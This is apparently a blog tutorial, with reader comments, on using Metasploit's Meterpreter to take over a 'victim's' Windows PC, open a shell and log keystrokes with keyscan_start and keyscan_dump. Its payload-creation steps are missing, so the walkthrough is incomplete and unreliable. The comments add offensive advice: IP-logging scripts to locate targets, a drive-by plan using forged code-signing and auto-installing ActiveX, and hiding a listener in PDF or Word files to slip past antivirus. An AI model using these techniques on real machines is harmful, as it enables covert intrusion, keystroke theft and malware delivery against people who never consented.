Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.

Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.

Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.

The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).

In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.

Exploit:A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.

Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.

Payload: Actual code which runs on the compromised system after exploitation

Now, what Metasploit IS?

It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.

METASPLOIT ANTI FORENSICS:

Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.

Metasploit comes in the following versions:

1. CLI (Command Line Interface)

2. Web Interface

3. MSF Console

4. MSFwx

5. MSFAPI

I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.

I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.

For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.

Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.

Let the Hacking Begin :

Open up backtrack. You should have a screen similar to this.

The default login credentials are:

Username: root

Pass: toor

Type in

root@bt:~#/etc/init.d/wicd start

to start the wicd manager

Finally, type "startx" to start the GUI mode:

root@bt:~#startx

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:

root@bt:~#ifconfig

It would be something like 192.168.x.x or 10.x.x.x.

Have a note of it.

Now,

Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now be having a shell something similar to a command prompt in windows.

msf >

Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.

Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victim’s computer,

Jus type shell

meterpreter > shell

Process 5428 created.

Channel 1 created.

Microsoft Windows [Version 6.1.7600]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

You would now be having a command prompt,

Type in whoami, to see the computer’s name of victim :

C:\Windows\system32>whoami

whoami

win7-pc\win 7

C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.

Type in:

Let’s say the victim has typed in anything on his computer.

Just type exit, to return to meterpreter.

Now type in keyscan_dump, to see all the typed keystrokes :

meterpreter > keyscan_dump

Dumping captured keystrokes...

GaM3 0V3R

P.S.: The above information is just for educational purposes only. You should test it against the computer you own.

About Author : This is a guest article written by Mr. Aditya Gupta. He is a Cyber Security Expert and C|EH Certified Ethical Hacker. His main expertise include Privacy Issues online, Web Application Security and Wireless Hacking. You can connect with him on facebook here.

@qwerty vmware is a virtualization software. You can run multiple operating systems on a same machine. You dont need the dual booting. You can use Backtrack on your current operating system using backtrack vmware image.

ISO image is meant to be burned on a disk and you can install it. Use this if you dont want to run backtrack on your current os

To get the IP, one thing you can do, is to use an IP logger PHP Script, host it on a free webhost, and ask the user to visit that link. It may sound little complicated, but trust me, its really simple.

This one is done in a vm , but how to carry out this in real world situation,should i first port forward or dmz my vm (bt ) machine then use my local ip or my external ip . could u please share some light on this

hi frndzhelp me plz its all going well & i got a session also but some problem like[*] Started reverse handler on 192.168.255.130:4444[*] Starting the payload handler...Now, the payload is listening for all the incoming connections on port 444.[*] Sending stage (749056 bytes) to 192.168.255.1[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

dats it... its not going more,,,when i type session -l its show command not found...

i av bt5 live cd, buh im finding it difficult to configure my hsdpa modem with it.i also have ubuntu 10.6 dual boot with windows, ive successfully configured my modem with it ubuntu.how can i copy the exploiting softwares from the bt5 livecd to the ubuntu os,Ill really appreciate ur gud response.

it's all about your hardwork and some knowledge, if you try to get in someone's pc, it takes 100 try and only one you might get success...in short..lots of...A LOT...work required. Do you understand now?, in short, 99 % chances are of only failure.

it's all about your hardwork and some knowledge, if you try to get in someone's pc, it takes 100 try and only one you might get success...in short..lots of...A LOT...work required. Do you understand now?, in short, 99 % chances are of only failure.

This won't work for real, are poeple really this stupid? First off, you have to manually infect a machine. Second, you have to connect to it, it doesn't connect to you.

99% of the time the machines on the net are behind firewalls which means requirement one is out!

99% of the time the machines on the net are behind firewalls which means requirement two is out!

This isn't hacking, if you actually do this at work or on a private network, you WILL GET CAUGHT. This example is a glorified version of VNC with a hidden tasktray icon. I wrote a self installing VNC ver, with no tray or installer, it self installed w a preset pass.

If you want to know what a real world example of something like this would be, I'll tell you. 1) Crack any public web server2) Build the exact reverse of this example with Meta, so that the exe connects to you when ran, then take an MD5 signed piece of trusted code, find the collisions to the hash and copy the cert to your app. Your app also needs to be an activeX control, or if your not that good, make it a Click Once...3) Get a VPS anonymously and setup the listener, setup a bunch and make sure they are all on different ports, or better yet, proxy the inbound connections.4) put the Signed ActiveX/ClickOnce control on the site so it auto-installs when a browser goes there.5) Sit on your VPS, or a hacked one, and wait...

Thats a real world example which will actually work in the real world no problem. One tip, when searching for valid signed exe's, look at the older apps... new ones are sha1.. Thats right, I just told the whole world how to bypass MS security right now, and any time for the next few years no problem, there isn't a knowledgebase in the world that'll include a CRL for their ROOT CA's... No way at all. Windoz Suckz.3dge3lite

very nice tutorial, and clearly intended for pen testing purposes as well.People who want to know what a real hack looks like, try looking at card tricks, it's a bit of show and a good trick usually. But if you know how it works it's usually just a few simple steps and a show that fits the situation. Hacking is usually a bit like this, one most of the time seemingly harmless entrypoint gives an opportunity to hack the rest of the system. What you need to know if you want to understand how these hacks work is everything about the software used and know where the vurnerabilities are most likely to be found. The hack is done by the hacker, not by the tools!

surfing with proxy websites and IP spoofing are same techniques ? if not, why proxy websites are construct ? if any hacker use proxy website for cyber crime, will he/she not be traced ?????? hope that you'll reply me !!!!

Ok now author I'm using a windows7 on my laptop and I head that there is some dual os or something like that is it possible for me to have both the Linux and the windows on the same laptop if this is possible how can I go about doing it.Please mail me to: mymcsi.mymcsiworld@gmail.com

Dual boot is pretty easy. With windows, Defrag your drive first then resize your windows partition with gparted or any other partitioning software. Then reboot with linux disk and run installation, make sure you select the empty space and not your windows partition....done

Websites log IPs; this is a website; your IP has been logged.This post appears to be a tutorial for newbs; the questions in the comments are likely from newbs.One of the magic things Metasploit is capable of is accessing a computer without the need of manually placing a helper (such as the reverse_tcp.exe file required in the tutorial) on the target machine.

Bring this all together and realize that this page is bait, not a tutorial.

Since I'm testing it on my own hardware , I don't care about anonymity so can I do this tutorial on the windows version of metasploit ? I don't want to download backtrack since bandwidth here is very limited and internet expensive

You can use metasploit to change the signature of the listner, then just hide it in a pdf or word document and send it, I would recommend uploading it and giving your victim a link rather then sending it via mail since the antivirus in emails are more likey to have up to date databases of virus signatures

Very easy and nice explanation, Thanks for uploading nice turorial. I request you to post an article on how to know which exploit and payloads are available for particular windows operating system, like XP, WINDOWS7 and WINDOWS 8 etc. Thanks.

Free online HTML tutorial for beginners with examples - HTML tutorial will help you in creating website, after study the tutorial you will just one step ahead of creating your own website. HTML is easy to understand and you will enjoy it to learn. HTML tutorial contains hundreds of examples to better understand.

This one is done in a vm , but how to carry out this in real world situation,should i first port forward or dmz my vm (bt ) machine then use my local ip or my external ip . could u please share some light on this.

I have worked on Bt few years back... I would like to know from BT team can try make android version I have seen Google as it shows arm model of android which is heavy Can BT team make it lighter to load on android with less efforts...

Will be waiting for reply with results...Well THx for wonderful tool...